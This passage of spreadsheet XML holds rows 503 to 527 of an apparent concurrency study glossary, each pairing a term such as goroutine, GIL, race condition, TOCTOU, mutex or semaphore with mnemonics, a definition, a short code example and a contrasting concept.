      <c r="B505" t="inlineStr">
        <is>
          <t>503</t>
        </is>
      </c>
      <c r="C505" t="inlineStr">
        <is>
          <t>Context switch cost</t>
        </is>
      </c>
      <c r="D505" t="inlineStr">
        <is>
          <t>A chef yanked mid-recipe to another kitchen: pack every pan (registers), and the new oven is stone cold (cache).</t>
        </is>
      </c>
      <c r="E505" t="inlineStr">
        <is>
          <t>Swapping the CPU between threads costs saving/restoring registers plus lost cache and TLB warmth — microseconds each, ruinous in bulk.</t>
        </is>
      </c>
      <c r="F505" t="inlineStr">
        <is>
          <t>10k threads ping-ponging: throughput collapses / vmstat 'cs' column counts switches/sec</t>
        </is>
      </c>
      <c r="G505" t="inlineStr">
        <is>
          <t>Function call — a call stays within one thread; a context switch swaps the entire execution state.</t>
        </is>
      </c>
      <c r="H505" t="inlineStr">
        <is>
          <t>Swapping drivers mid-race including reshaping the seat each time.</t>
        </is>
      </c>
      <c r="J505" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K505" t="inlineStr">
        <is>
          <t>Processes, threads &amp; basics</t>
        </is>
      </c>
    </row>
    <row r="506">
      <c r="A506" t="n">
        <v>0</v>
      </c>
      <c r="B506" t="inlineStr">
        <is>
          <t>504</t>
        </is>
      </c>
      <c r="C506" t="inlineStr">
        <is>
          <t>Green threads</t>
        </is>
      </c>
      <c r="D506" t="inlineStr">
        <is>
          <t>Toy soldiers on little green plastic bases marching around inside the house: city hall (the kernel) never knows they exist.</t>
        </is>
      </c>
      <c r="E506" t="inlineStr">
        <is>
          <t>Threads scheduled by a language runtime in user space, invisible to the OS kernel — very cheap to create and switch.</t>
        </is>
      </c>
      <c r="F506" t="inlineStr">
        <is>
          <t>gevent.spawn(handler) # user-space thread / Erlang: millions of processes per VM</t>
        </is>
      </c>
      <c r="G506" t="inlineStr">
        <is>
          <t>OS thread — the kernel schedules OS threads; the runtime schedules green threads, so one blocking syscall can stall many.</t>
        </is>
      </c>
      <c r="H506" t="inlineStr">
        <is>
          <t>A puppet troupe where one puppeteer (runtime) moves all puppets.</t>
        </is>
      </c>
      <c r="J506" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K506" t="inlineStr">
        <is>
          <t>Processes, threads &amp; basics</t>
        </is>
      </c>
    </row>
    <row r="507">
      <c r="A507" t="n">
        <v>0</v>
      </c>
      <c r="B507" t="inlineStr">
        <is>
          <t>505</t>
        </is>
      </c>
      <c r="C507" t="inlineStr">
        <is>
          <t>Goroutine</t>
        </is>
      </c>
      <c r="D507" t="inlineStr">
        <is>
          <t>'Go!' — a starter pistol cracks and ten thousand tiny runners sprint off, sharing five lanes (OS threads) by hopping between them.</t>
        </is>
      </c>
      <c r="E507" t="inlineStr">
        <is>
          <t>Go's lightweight coroutine: starts with a ~2KB growable stack and is multiplexed M:N onto a few OS threads by Go's scheduler.</t>
        </is>
      </c>
      <c r="F507" t="inlineStr">
        <is>
          <t>go fetch(url) // spawns in microseconds / stacks grow and shrink on demand</t>
        </is>
      </c>
      <c r="G507" t="inlineStr">
        <is>
          <t>OS thread — a goroutine costs kilobytes and is runtime-scheduled; an OS thread costs megabytes of stack and kernel switches.</t>
        </is>
      </c>
      <c r="H507" t="inlineStr">
        <is>
          <t>Gopher relay teams swapping onto a handful of treadmills.</t>
        </is>
      </c>
      <c r="J507" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K507" t="inlineStr">
        <is>
          <t>Processes, threads &amp; basics</t>
        </is>
      </c>
    </row>
    <row r="508">
      <c r="A508" t="n">
        <v>0</v>
      </c>
      <c r="B508" t="inlineStr">
        <is>
          <t>506</t>
        </is>
      </c>
      <c r="C508" t="inlineStr">
        <is>
          <t>GIL</t>
        </is>
      </c>
      <c r="D508" t="inlineStr">
        <is>
          <t>A single karaoke microphone in a pit of pythons: many singers coiled and ready, but only the snake holding the mic makes any sound.</t>
        </is>
      </c>
      <c r="E508" t="inlineStr">
        <is>
          <t>CPython's Global Interpreter Lock lets only one thread execute Python bytecode at a time, so threads give no CPU-bound speedup.</t>
        </is>
      </c>
      <c r="F508" t="inlineStr">
        <is>
          <t>4 CPython threads of pure math: ~1x speedup / use multiprocessing for CPU-bound work</t>
        </is>
      </c>
      <c r="G508" t="inlineStr">
        <is>
          <t>Mutex on your data — the GIL protects the interpreter's internals, not your logic; your own races still exist between bytecodes.</t>
        </is>
      </c>
      <c r="H508" t="inlineStr">
        <is>
          <t>One-lane bridge into an otherwise huge city.</t>
        </is>
      </c>
      <c r="J508" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K508" t="inlineStr">
        <is>
          <t>Processes, threads &amp; basics</t>
        </is>
      </c>
    </row>
    <row r="509">
      <c r="A509" t="n">
        <v>0</v>
      </c>
      <c r="B509" t="inlineStr">
        <is>
          <t>507</t>
        </is>
      </c>
      <c r="C509" t="inlineStr">
        <is>
          <t>Preemptive vs cooperative scheduling</t>
        </is>
      </c>
      <c r="D509" t="inlineStr">
        <is>
          <t>A referee's whistle yanks players off the field mid-stride (preemptive) versus dancers who leave the floor only when they choose to bow out (cooperative).</t>
        </is>
      </c>
      <c r="E509" t="inlineStr">
        <is>
          <t>Preemptive schedulers interrupt tasks at any moment via timer; cooperative tasks run until they voluntarily yield control.</t>
        </is>
      </c>
      <c r="F509" t="inlineStr">
        <is>
          <t>OS thread: preempted by timer interrupt / asyncio task: runs until an await</t>
        </is>
      </c>
      <c r="G509" t="inlineStr">
        <is>
          <t>Concurrency vs parallelism — scheduling style says when control changes hands, not how many tasks truly run at once.</t>
        </is>
      </c>
      <c r="H509" t="inlineStr">
        <is>
          <t>Alarm-clock shifts vs 'leave whenever you finish' shifts.</t>
        </is>
      </c>
      <c r="J509" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K509" t="inlineStr">
        <is>
          <t>Processes, threads &amp; basics</t>
        </is>
      </c>
    </row>
    <row r="510">
      <c r="A510" t="n">
        <v>0</v>
      </c>
      <c r="B510" t="inlineStr">
        <is>
          <t>508</t>
        </is>
      </c>
      <c r="C510" t="inlineStr">
        <is>
          <t>Thread lifecycle &amp; join</t>
        </is>
      </c>
      <c r="D510" t="inlineStr">
        <is>
          <t>A relay runner waits at the line, palm out, until the teammate slaps it (join); ghost runners (daemons) simply vanish when the stadium lights cut.</t>
        </is>
      </c>
      <c r="E510" t="inlineStr">
        <is>
          <t>A thread is created, started, runs, terminates; join() blocks the caller until it finishes, and daemon threads die with the process.</t>
        </is>
      </c>
      <c r="F510" t="inlineStr">
        <is>
          <t>t.start() / t.join(timeout=5) / Thread(target=f, daemon=True)</t>
        </is>
      </c>
      <c r="G510" t="inlineStr">
        <is>
          <t>join vs sleep — join waits for a specific thread's completion; sleep waits a blind wall-clock interval.</t>
        </is>
      </c>
      <c r="H510" t="inlineStr">
        <is>
          <t>A parent waiting at school pickup until the child actually walks out.</t>
        </is>
      </c>
      <c r="J510" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K510" t="inlineStr">
        <is>
          <t>Processes, threads &amp; basics</t>
        </is>
      </c>
    </row>
    <row r="511">
      <c r="A511" t="n">
        <v>0</v>
      </c>
      <c r="B511" t="inlineStr">
        <is>
          <t>509</t>
        </is>
      </c>
      <c r="C511" t="inlineStr">
        <is>
          <t>CPU-bound vs I/O-bound</t>
        </is>
      </c>
      <c r="D511" t="inlineStr">
        <is>
          <t>A mathematician sweating over a chalkboard (CPU-bound) beside a fisherman dozing while ten lines wait for bites (I/O-bound).</t>
        </is>
      </c>
      <c r="E511" t="inlineStr">
        <is>
          <t>CPU-bound work is limited by computation and wants parallel cores; I/O-bound work mostly waits on the outside world and wants concurrency.</t>
        </is>
      </c>
      <c r="F511" t="inlineStr">
        <is>
          <t>CPU-bound: video encode -&gt; multiprocessing / I/O-bound: 100 HTTP calls -&gt; asyncio or threads</t>
        </is>
      </c>
      <c r="G511" t="inlineStr">
        <is>
          <t>Concurrency vs parallelism — bound-type describes the workload; concurrency/parallelism describe the execution strategy you pick for it.</t>
        </is>
      </c>
      <c r="H511" t="inlineStr">
        <is>
          <t>Weightlifter (muscle-limited) vs receptionist (waiting-limited).</t>
        </is>
      </c>
      <c r="J511" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K511" t="inlineStr">
        <is>
          <t>Processes, threads &amp; basics</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" t="n">
        <v>0</v>
      </c>
      <c r="B512" t="inlineStr">
        <is>
          <t>510</t>
        </is>
      </c>
      <c r="C512" t="inlineStr">
        <is>
          <t>Race condition</t>
        </is>
      </c>
      <c r="D512" t="inlineStr">
        <is>
          <t>Two Black Friday shoppers sprint for the last TV; who wins hangs on a shoelace, and the store's inventory books end up wrong either way.</t>
        </is>
      </c>
      <c r="E512" t="inlineStr">
        <is>
          <t>A bug where correctness depends on the timing or interleaving of concurrent operations — some orderings work, others corrupt state.</t>
        </is>
      </c>
      <c r="F512" t="inlineStr">
        <is>
          <t>bal = get(); set(bal + 100) / two concurrent deposits: one vanishes</t>
        </is>
      </c>
      <c r="G512" t="inlineStr">
        <is>
          <t>Data race — a data race is one low-level cause; race conditions can exist even when every access is individually synchronized.</t>
        </is>
      </c>
      <c r="H512" t="inlineStr">
        <is>
          <t>Photo-finish horse race where the payout differs by a nose.</t>
        </is>
      </c>
      <c r="J512" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K512" t="inlineStr">
        <is>
          <t>Race conditions &amp; shared state</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" t="n">
        <v>0</v>
      </c>
      <c r="B513" t="inlineStr">
        <is>
          <t>511</t>
        </is>
      </c>
      <c r="C513" t="inlineStr">
        <is>
          <t>Data race</t>
        </is>
      </c>
      <c r="D513" t="inlineStr">
        <is>
          <t>Two painters slapping different colors onto the same fence plank at the same instant — the plank dries a smeared, illegal color no can ordered.</t>
        </is>
      </c>
      <c r="E513" t="inlineStr">
        <is>
          <t>Two threads access the same memory location unsynchronized with at least one write — undefined behavior in C/C++/Go memory models.</t>
        </is>
      </c>
      <c r="F513" t="inlineStr">
        <is>
          <t>counter++ from two goroutines / go run -race . -&gt; DATA RACE report</t>
        </is>
      </c>
      <c r="G513" t="inlineStr">
        <is>
          <t>Race condition — data race = unsynchronized memory access; race condition = timing-dependent logic bug. Each can occur without the other.</t>
        </is>
      </c>
      <c r="H513" t="inlineStr">
        <is>
          <t>Two radio stations broadcasting on one frequency.</t>
        </is>
      </c>
      <c r="J513" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K513" t="inlineStr">
        <is>
          <t>Race conditions &amp; shared state</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" t="n">
        <v>0</v>
      </c>
      <c r="B514" t="inlineStr">
        <is>
          <t>512</t>
        </is>
      </c>
      <c r="C514" t="inlineStr">
        <is>
          <t>Shared mutable state</t>
        </is>
      </c>
      <c r="D514" t="inlineStr">
        <is>
          <t>One whiteboard in a room of scribbling interns, everyone erasing each other's numbers mid-calculation.</t>
        </is>
      </c>
      <c r="E514" t="inlineStr">
        <is>
          <t>Data that multiple threads can both read and write — the root enabler of races; remove either sharing or mutation and races vanish.</t>
        </is>
      </c>
      <c r="F514" t="inlineStr">
        <is>
          <t>global cache = {} # touched by all threads / fix: pass messages or freeze the data</t>
        </is>
      </c>
      <c r="G514" t="inlineStr">
        <is>
          <t>Global variable — a single-threaded global is merely ugly; shared mutable state across threads is actively dangerous.</t>
        </is>
      </c>
      <c r="H514" t="inlineStr">
        <is>
          <t>A communal toothbrush.</t>
        </is>
      </c>
      <c r="J514" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K514" t="inlineStr">
        <is>
          <t>Race conditions &amp; shared state</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" t="n">
        <v>0</v>
      </c>
      <c r="B515" t="inlineStr">
        <is>
          <t>513</t>
        </is>
      </c>
      <c r="C515" t="inlineStr">
        <is>
          <t>Critical section</t>
        </is>
      </c>
      <c r="D515" t="inlineStr">
        <is>
          <t>A gas-station restroom with one key chained to a huge wooden paddle: whoever holds the paddle is provably alone inside.</t>
        </is>
      </c>
      <c r="E515" t="inlineStr">
        <is>
          <t>A code region touching shared state that must be executed by at most one thread at a time.</t>
        </is>
      </c>
      <c r="F515" t="inlineStr">
        <is>
          <t>with lock: / shared_list.append(item) # critical section</t>
        </is>
      </c>
      <c r="G515" t="inlineStr">
        <is>
          <t>Mutex — the mutex is the mechanism; the critical section is the code region the mutex protects.</t>
        </is>
      </c>
      <c r="H515" t="inlineStr">
        <is>
          <t>The single-occupancy voting booth.</t>
        </is>
      </c>
      <c r="J515" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K515" t="inlineStr">
        <is>
          <t>Race conditions &amp; shared state</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" t="n">
        <v>0</v>
      </c>
      <c r="B516" t="inlineStr">
        <is>
          <t>514</t>
        </is>
      </c>
      <c r="C516" t="inlineStr">
        <is>
          <t>Non-atomic increment</t>
        </is>
      </c>
      <c r="D516" t="inlineStr">
        <is>
          <t>Updating a scoreboard by carrying the number card to a back desk, penciling +1, and carrying it back — meanwhile someone swapped the board.</t>
        </is>
      </c>
      <c r="E516" t="inlineStr">
        <is>
          <t>x += 1 is really read, add, write — three machine steps another thread can interleave between, silently losing counts.</t>
        </is>
      </c>
      <c r="F516" t="inlineStr">
        <is>
          <t>counter += 1 # LOAD, ADD, STORE / 2 threads x 1M increments: total &lt; 2M</t>
        </is>
      </c>
      <c r="G516" t="inlineStr">
        <is>
          <t>Atomic add — fetch_add performs the whole read-modify-write as one indivisible hardware step.</t>
        </is>
      </c>
      <c r="H516" t="inlineStr">
        <is>
          <t>Two people updating one tally by memory after walking away from it.</t>
        </is>
      </c>
      <c r="J516" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K516" t="inlineStr">
        <is>
          <t>Race conditions &amp; shared state</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" t="n">
        <v>0</v>
      </c>
      <c r="B517" t="inlineStr">
        <is>
          <t>515</t>
        </is>
      </c>
      <c r="C517" t="inlineStr">
        <is>
          <t>Lost update</t>
        </is>
      </c>
      <c r="D517" t="inlineStr">
        <is>
          <t>Two clerks photocopy the same ledger page, each pencils in a different deposit, and the last one to re-file replaces the other's page entirely.</t>
        </is>
      </c>
      <c r="E517" t="inlineStr">
        <is>
          <t>Two concurrent read-modify-write cycles overlap, and the later write silently overwrites the earlier one's change.</t>
        </is>
      </c>
      <c r="F517" t="inlineStr">
        <is>
          <t>T1: read 100, write 110 / T2: read 100, write 105 -&gt; the +10 is gone</t>
        </is>
      </c>
      <c r="G517" t="inlineStr">
        <is>
          <t>Torn read — a torn read sees half-updated data; a lost update destroys a whole committed change.</t>
        </is>
      </c>
      <c r="H517" t="inlineStr">
        <is>
          <t>Two people saving the same doc from stale local copies.</t>
        </is>
      </c>
      <c r="J517" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K517" t="inlineStr">
        <is>
          <t>Race conditions &amp; shared state</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" t="n">
        <v>0</v>
      </c>
      <c r="B518" t="inlineStr">
        <is>
          <t>516</t>
        </is>
      </c>
      <c r="C518" t="inlineStr">
        <is>
          <t>Check-then-act (TOCTOU)</t>
        </is>
      </c>
      <c r="D518" t="inlineStr">
        <is>
          <t>You glance at a green walk light, look down at your phone, then step off the curb — the light changed inside your glance-to-step gap.</t>
        </is>
      </c>
      <c r="E518" t="inlineStr">
        <is>
          <t>State verified by a check can change before the act that relies on it — the time-of-check to time-of-use gap is a race window.</t>
        </is>
      </c>
      <c r="F518" t="inlineStr">
        <is>
          <t>if not os.path.exists(f): open(f, 'w') / # attacker swaps in a symlink between the two</t>
        </is>
      </c>
      <c r="G518" t="inlineStr">
        <is>
          <t>Lost update — TOCTOU acts on a stale check; lost update overwrites a concurrent write. Fix both by fusing check+act into one atomic step.</t>
        </is>
      </c>
      <c r="H518" t="inlineStr">
        <is>
          <t>Checking the mirror, then changing lanes three seconds later.</t>
        </is>
      </c>
      <c r="J518" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K518" t="inlineStr">
        <is>
          <t>Race conditions &amp; shared state</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" t="n">
        <v>0</v>
      </c>
      <c r="B519" t="inlineStr">
        <is>
          <t>517</t>
        </is>
      </c>
      <c r="C519" t="inlineStr">
        <is>
          <t>Torn read/write</t>
        </is>
      </c>
      <c r="D519" t="inlineStr">
        <is>
          <t>Ripping a photo mid-swap: the top half shows the new face, the bottom half the old one — a hybrid monster nobody ever photographed.</t>
        </is>
      </c>
      <c r="E519" t="inlineStr">
        <is>
          <t>A multi-word value accessed non-atomically can be observed half-updated — new high bits paired with old low bits.</t>
        </is>
      </c>
      <c r="F519" t="inlineStr">
        <is>
          <t>64-bit store on a 32-bit CPU = two writes / reader sees hi(new) | lo(old)</t>
        </is>
      </c>
      <c r="G519" t="inlineStr">
        <is>
          <t>Stale read — a stale value truly existed at some earlier time; a torn value never existed at any time.</t>
        </is>
      </c>
      <c r="H519" t="inlineStr">
        <is>
          <t>A split-flap airport board caught mid-flip spelling gibberish.</t>
        </is>
      </c>
      <c r="J519" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K519" t="inlineStr">
        <is>
          <t>Race conditions &amp; shared state</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" t="n">
        <v>0</v>
      </c>
      <c r="B520" t="inlineStr">
        <is>
          <t>518</t>
        </is>
      </c>
      <c r="C520" t="inlineStr">
        <is>
          <t>Happens-before</t>
        </is>
      </c>
      <c r="D520" t="inlineStr">
        <is>
          <t>A courier chain of wax-sealed handoffs: only letters sealed into the bag BEFORE the handoff are guaranteed to ride in the next courier's satchel.</t>
        </is>
      </c>
      <c r="E520" t="inlineStr">
        <is>
          <t>The memory-model relation that guarantees one action's effects are visible to another; without an edge, ordering and visibility are undefined.</t>
        </is>
      </c>
      <c r="F520" t="inlineStr">
        <is>
          <t>unlock(m) happens-before the next lock(m) / t.start() h-b all actions inside t</t>
        </is>
      </c>
      <c r="G520" t="inlineStr">
        <is>
          <t>Wall-clock order — happening earlier in real time proves nothing; only synchronization edges create happens-before.</t>
        </is>
      </c>
      <c r="H520" t="inlineStr">
        <is>
          <t>Baton pass: whatever was taped to the baton beforehand arrives with it.</t>
        </is>
      </c>
      <c r="J520" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K520" t="inlineStr">
        <is>
          <t>Race conditions &amp; shared state</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" t="n">
        <v>0</v>
      </c>
      <c r="B521" t="inlineStr">
        <is>
          <t>519</t>
        </is>
      </c>
      <c r="C521" t="inlineStr">
        <is>
          <t>Thread interleaving</t>
        </is>
      </c>
      <c r="D521" t="inlineStr">
        <is>
          <t>Two card sharks riffle-shuffling their decks together: every shuffle lands a different merge, and one poisoned ordering somewhere in the trillions loses the house.</t>
        </is>
      </c>
      <c r="E521" t="inlineStr">
        <is>
          <t>A concurrent run is one of exponentially many possible orderings of the threads' steps; the program is correct only if EVERY interleaving is.</t>
        </is>
      </c>
      <c r="F521" t="inlineStr">
        <is>
          <t>T1 reads x=0 / T2 reads x=0 / both write 1 - one increment lost in this interleaving</t>
        </is>
      </c>
      <c r="G521" t="inlineStr">
        <is>
          <t>vs data race (511): a race is the bad outcome; interleaving is the underlying nondeterministic scheduling model | cf. 928 Heisenbug: observing shifts which interleaving you get</t>
        </is>
      </c>
      <c r="H521" t="inlineStr">
        <is>
          <t>zipper teeth meshing differently on every pull</t>
        </is>
      </c>
      <c r="J521" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K521" t="inlineStr">
        <is>
          <t>Race conditions &amp; shared state</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" t="n">
        <v>0</v>
      </c>
      <c r="B522" t="inlineStr">
        <is>
          <t>520</t>
        </is>
      </c>
      <c r="C522" t="inlineStr">
        <is>
          <t>Mutex</t>
        </is>
      </c>
      <c r="D522" t="inlineStr">
        <is>
          <t>A restroom key chained to your own belt loop: you carry it in, and only you can hang it back — nobody else may return your key.</t>
        </is>
      </c>
      <c r="E522" t="inlineStr">
        <is>
          <t>A mutual-exclusion lock with an owner: the thread that locks it must be the one to unlock it, admitting one holder at a time.</t>
        </is>
      </c>
      <c r="F522" t="inlineStr">
        <is>
          <t>lock = threading.Lock() / with lock: / update_shared()</t>
        </is>
      </c>
      <c r="G522" t="inlineStr">
        <is>
          <t>Semaphore — a mutex has an owner and count 1; a semaphore is an ownerless counter that any thread may signal.</t>
        </is>
      </c>
      <c r="H522" t="inlineStr">
        <is>
          <t>A talking stick only its current holder can pass on.</t>
        </is>
      </c>
      <c r="J522" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K522" t="inlineStr">
        <is>
          <t>Locks &amp; mutual exclusion</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" t="n">
        <v>0</v>
      </c>
      <c r="B523" t="inlineStr">
        <is>
          <t>521</t>
        </is>
      </c>
      <c r="C523" t="inlineStr">
        <is>
          <t>Semaphore</t>
        </is>
      </c>
      <c r="D523" t="inlineStr">
        <is>
          <t>A parking garage sign counting free spots down and up; the exit gate never checks which car took which spot.</t>
        </is>
      </c>
      <c r="E523" t="inlineStr">
        <is>
          <t>A counter of permits: acquire decrements and blocks at zero, release increments — and any thread may release, not just acquirers.</t>
        </is>
      </c>
      <c r="F523" t="inlineStr">
        <is>
          <t>sem = threading.Semaphore(3) / with sem: / call_rate_limited_api()</t>
        </is>
      </c>
      <c r="G523" t="inlineStr">
        <is>
          <t>Mutex — semaphores count anonymous permits; a mutex is a single owned lock. Semaphore(1) still lacks ownership.</t>
        </is>
      </c>
      <c r="H523" t="inlineStr">
        <is>
          <t>Bouncer with a clicker capping the club at N guests.</t>
        </is>
      </c>
      <c r="J523" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K523" t="inlineStr">
        <is>
          <t>Locks &amp; mutual exclusion</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" t="n">
        <v>0</v>
      </c>
      <c r="B524" t="inlineStr">
        <is>
          <t>522</t>
        </is>
      </c>
      <c r="C524" t="inlineStr">
        <is>
          <t>Monitor</t>
        </is>
      </c>
      <c r="D524" t="inlineStr">
        <is>
          <t>A monitor lizard guarding a one-door meeting hut, with a shaded waiting bench outside for members whose agenda item is not ready yet.</t>
        </is>
      </c>
      <c r="E524" t="inlineStr">
        <is>
          <t>A construct bundling a lock with condition variables so an object's methods run mutually exclusive and can wait on state changes.</t>
        </is>
      </c>
      <c r="F524" t="inlineStr">
        <is>
          <t>Java: synchronized(obj) { obj.wait(); } / every Java object is a monitor</t>
        </is>
      </c>
      <c r="G524" t="inlineStr">
        <is>
          <t>Mutex — a monitor is mutex + condition variables + the protected data, packaged as one abstraction.</t>
        </is>
      </c>
      <c r="H524" t="inlineStr">
        <is>
          <t>Hall monitor letting one student per hallway plus a wait line.</t>
        </is>
      </c>
      <c r="J524" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K524" t="inlineStr">
        <is>
          <t>Locks &amp; mutual exclusion</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" t="n">
        <v>0</v>
      </c>
      <c r="B525" t="inlineStr">
        <is>
          <t>523</t>
        </is>
      </c>
      <c r="C525" t="inlineStr">
        <is>
          <t>Condition variable</t>
        </is>
      </c>
      <c r="D525" t="inlineStr">
        <is>
          <t>A deli 'now serving' bell: customers doze on benches holding no counter space (lock released) until the bell wakes whoever's number is up.</t>
        </is>
      </c>
      <c r="E525" t="inlineStr">
        <is>
          <t>A wait/notify queue tied to a lock: waiters atomically release the lock and sleep until another thread signals the condition.</t>
        </is>
      </c>
      <c r="F525" t="inlineStr">
        <is>
          <t>with cv: / while not ready: cv.wait() / with cv: ready = True; cv.notify()</t>
        </is>
      </c>
      <c r="G525" t="inlineStr">
        <is>
          <t>Semaphore — a semaphore remembers releases as stored permits; a notify with no waiter present is lost forever.</t>
        </is>
      </c>
      <c r="H525" t="inlineStr">
        <is>
          <t>Nurse call-button board waking the on-duty station.</t>
        </is>
      </c>
      <c r="J525" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K525" t="inlineStr">
        <is>
          <t>Locks &amp; mutual exclusion</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" t="n">
        <v>0</v>
      </c>
      <c r="B526" t="inlineStr">
        <is>
          <t>524</t>
        </is>
      </c>
      <c r="C526" t="inlineStr">
        <is>
          <t>Spurious wakeup</t>
        </is>
      </c>
      <c r="D526" t="inlineStr">
        <is>
          <t>You jolt awake certain the doorbell rang — nobody's there. Ever since, you always check the peephole (recheck the predicate) before opening.</t>
        </is>
      </c>
      <c r="E526" t="inlineStr">
        <is>
          <t>A condition-variable wait may return with no signal sent, so the predicate must be rechecked in a while loop, never a bare if.</t>
        </is>
      </c>
      <c r="F526" t="inlineStr">
        <is>
          <t>while not queue: # never 'if' / cv.wait()</t>
        </is>
      </c>
      <c r="G526" t="inlineStr">
        <is>
          <t>Lost wakeup — spurious is waking without a signal; lost is a signal fired before anyone was waiting.</t>
        </is>
      </c>
      <c r="H526" t="inlineStr">
        <is>
          <t>Phantom phone vibration in your pocket.</t>
        </is>
      </c>
      <c r="J526" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K526" t="inlineStr">
        <is>
          <t>Locks &amp; mutual exclusion</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" t="n">
        <v>0</v>
      </c>
      <c r="B527" t="inlineStr">
        <is>
          <t>525</t>
        </is>
      </c>
      <c r="C527" t="inlineStr">
        <is>
          <t>Reentrant lock</t>
        </is>
      </c>
      <c r="D527" t="inlineStr">
        <is>
          <t>A hand stamp at a club: the stamped regular re-enters through any inner door while the bouncer just ticks a tally per pass.</t>
        </is>
      </c>
      <c r="E527" t="inlineStr">
        <is>
          <t>A lock its current owner may re-acquire recursively; it counts nested acquisitions and frees only when the count returns to zero.</t>
        </is>
      </c>
      <c r="F527" t="inlineStr">
        <is>
          <t>rl = threading.RLock() / with rl: / with rl: pass # same thread, fine</t>
        </is>
      </c>
      <c r="G527" t="inlineStr">
        <is>
          <t>Plain mutex — a non-reentrant lock deadlocks its own owner on the second acquire.</t>
        </is>
      </c>
      <c r="H527" t="inlineStr">
        <is>
          <t>Revolving door that remembers you're already inside.</t>
        </is>
      </c>
      <c r="J527" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K527" t="inlineStr">
        <is>
          <t>Locks &amp; mutual exclusion</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" t="n">
        <v>0</v>
      </c>
      <c r="B528" t="inlineStr">
        <is>
          <t>526</t>
        </is>
      </c>
      <c r="C528" t="inlineStr">
        <is>
          <t>Read-write lock</t>
        </is>
      </c>
      <c r="D528" t="inlineStr">
        <is>
          <t>A museum gallery: unlimited visitors may look at the painting together, but the restorer works alone behind a fully cleared rope.</t>
        </is>
      </c>
      <c r="E528" t="inlineStr">
        <is>
          <t>A lock granting either many concurrent readers or one exclusive writer — a big win for read-heavy shared data.</t>
        </is>
      </c>
      <c r="F528" t="inlineStr">
        <is>
          <t>rw = ReentrantReadWriteLock() // Java / rw.readLock() many; rw.writeLock() one</t>
        </is>
      </c>
      <c r="G528" t="inlineStr">
        <is>
          <t>Mutex — a mutex needlessly serializes readers too; RW locks parallelize reads but risk writer starvation.</t>
        </is>
      </c>
      <c r="H528" t="inlineStr">
        <is>
          <t>Library book: many may read the display copy, one may annotate.</t>
        </is>
      </c>
      <c r="J528" t="inlineStr">
        <is>
          <t>Concurrency &amp; parallelism</t>
        </is>
      </c>
      <c r="K528" t="inlineStr">
        <is>
          <t>Locks &amp; mutual exclusion</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" t="n">
        <v>0</v>
      </c>
      <c r="B529" t="inlineStr">
        <is>
          <t>527</t>
        </is>
      </c>
      <c r="C529" t="inlineStr">
        <is>
          <t>Lock granularity</t>
        </is>
      </c>
      <c r="D529" t="inlineStr">
        <is>
          <t>One giant padlock on the whole warehouse versus a tiny padlock on every drawer — pickers fly, but the janitor now carries 500 keys.</t>
        </is>
      </c>
      <c r="E529" t="inlineStr">
        <is>
          <t>How much data one lock covers: coarse locks are simple but serialize everything; fine locks scale but multiply deadlock risk.</t>
        </is>
      </c>
      <c r="F529" t="inlineStr">
        <is>
          <t>one lock per table vs per row / ConcurrentHashMap: striped per-bucket locks</t>
        </is>
      </c>
      <c r="G529" t="inlineStr">
        <is>
          <t>Contention — granularity is the design choice; contention is the symptom that too-coarse granularity causes.</t>
        </is>
      </c>
      <c r="H529" t="inlineStr">
        <is>
